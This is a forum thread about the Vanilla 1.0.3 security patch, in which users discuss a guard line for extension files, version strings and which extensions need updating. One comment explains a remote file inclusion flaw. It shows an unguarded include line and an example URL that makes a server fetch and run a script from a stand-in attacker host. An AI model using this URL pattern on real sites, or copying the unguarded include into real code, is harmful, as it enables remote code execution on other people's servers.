Vanilla 1 is no longer supported or maintained. If you need a copy, you can get it here.
HackerOne users: Testing against this community violates our program's Terms of Service and will result in your bounty being denied.
! Vanilla 1.0.3 Released !
Mark
Vanilla Staff
This release patches a potential security hole in Vanilla. To read more about the patch and how to apply it, read the blog entry.
0
This discussion has been closed.
Comments
Any reason why lussumo.com/community is still on 1.0.1?
if (!defined('IN_VANILLA')) exit();
Thanks to Dinoboff for pointing out this additional spot where the patch is required.
Could someone (Dinoboff?) point out why this is needed? The patched main init_* should already have exited, before loading extensions, is'nt it?
include($foo . 'bar.php');
The bad guy just have to access www.victim.com/extensions/example/default.php?foo=http://www.badguy.com/evilscripts/ to execute http://www.badguy.com/evilscripts/bar.php on your server.
That is especially risky with extension files since we don't include any .htaccess file with them like the one that is in appg/
I'd suggest to add one as a supplemental precaution.
Ah, BTW, the debug.php file in the Vanilla root folder has such includes and is not patched.
OK, I'm sure that means something to most people, but it means nothing to me What does it mean?
Anyway, in response to your question... Possibly (I'm not sure), but it would be much less straightforward than the appg/.htaccess. The tricky part is that some files in extension directories do need to be fetched by clients, including calling PHP scripts sometimes, such as AJAX handlers. So we can't simply block all access like we do in appg.
Do we also update this in appg/settings.php to 1.0.3?
define('APPLICATION_VERSION', '1.0.2');
Will it stuff up the Check for Updates gadget?
So far, the only extensions (from the ones that I have installed) that need to be updated are the Atom, RSS2 and Patch Request Password extensions.
@Max_B - Dinoboff is correct that the debug.php file is safe since the file includes the appg/settings.php file before any other files are included. This makes it so that no matter what an attacker puts in the querystring, the values are re-defined first by the appg/settings.php version of the variables, and then again by your custom conf/settings.php variables.
@Dinoboff - I've updated the Atom, RSS2, and IpHistory extensions. They were the only extensions written by me that needed the patch.
Some servers might not have .htaccess files enabled, so I have to assume that they don't when applying code-fixes.